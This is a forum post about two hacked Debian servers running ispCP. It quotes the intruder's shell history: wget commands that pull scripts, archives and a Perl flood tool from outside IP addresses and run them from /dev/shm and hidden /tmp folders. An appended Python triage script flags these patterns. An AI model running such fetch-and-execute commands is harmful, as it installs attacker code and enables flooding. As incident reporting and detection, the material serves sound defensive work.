2 Omega boxes hacked...
robmorin
Post: #1
Hello all, long time no post :)

I had a friend call me to say he had 2 Debian servers acting funny. It turns out they were both hacked, and both servers run ispCP.

Both servers had weird running Perl scripts and httpd binaries running as user vu2000.

He is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos

That user has no shell in the passwd file; however, the .bash_history file for that user on both boxes had this in it:

/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood

There must be an exploit somewhere...

Now I left one box running, still hacked, so as to maybe find more info to help out in case it is an exploit... So what's the next step?

Thanks...
05-06-2011 02:00 AM
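A triage sketch for the indicators described in the post above, added here as an example and not part of the original thread or of ispCP: it lists accounts that have no login shell (for which any shell history is itself a red flag) and tags history lines that download into world-writable directories, chain a download with execution, or enter dot-directories. The shell list, directory list, tag names, home path and the 192.0.2.x hosts in the sample data are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumptions (not from the post): shells counted as "no login" and the
# world-writable directories treated as staging areas.
NOLOGIN_SHELLS = {"", "/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
STAGING_DIRS = ("/dev/shm", "/tmp", "/var/tmp")
FETCH = re.compile(r"^(wget|curl|fetch)\b")
EXEC = re.compile(r"^(sh|bash|perl|python\d*|php|\./\S+)(\s|$)")

# Constructed sample input, shaped like the history quoted in the post.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "vu2000:x:2000:2000::/var/www/virtual/example.test:/bin/false\n")
SAMPLE_HISTORY = """/sbin/ifconfig|grep inet
cd /dev/shm
wget http://192.0.2.10/.x/stage.sh ; sh stage.sh
cd /tmp
cd .ICE-unix
wget http://192.0.2.20/d/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
ls -al
"""

def nologin_users(passwd_text):
    """Map accounts without a login shell to their home directory."""
    users = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6].strip() in NOLOGIN_SHELLS:
            users[fields[0]] = fields[5]
    return users

def triage_history(history_text):
    """Return (line_number, tag) findings for one shell history file."""
    findings, cwd = [], "/"  # the real starting directory is unknown
    for number, line in enumerate(history_text.splitlines(), 1):
        fetched = False  # has this command line already downloaded something?
        for cmd in (c.strip() for c in re.split(r";|&&|\|\|", line)):
            cd = re.match(r"^cd\s+(\S+)$", cmd)
            if cd:
                cwd = posixpath.normpath(posixpath.join(cwd, cd.group(1)))
                name = posixpath.basename(cd.group(1).rstrip("/"))
                if name.startswith(".") and name not in (".", ".."):
                    findings.append((number, "hidden-dir"))
            elif FETCH.match(cmd):
                fetched = True
                if any(cwd == d or cwd.startswith(d + "/") for d in STAGING_DIRS):
                    findings.append((number, "fetch-in-staging"))
            elif EXEC.match(cmd) and fetched:
                findings.append((number, "fetch-then-exec"))
    return findings
```

On a real host the inputs would be the contents of /etc/passwd and of each flagged account's .bash_history, read from a copy of the disk or a read-only mount so the evidence is not altered.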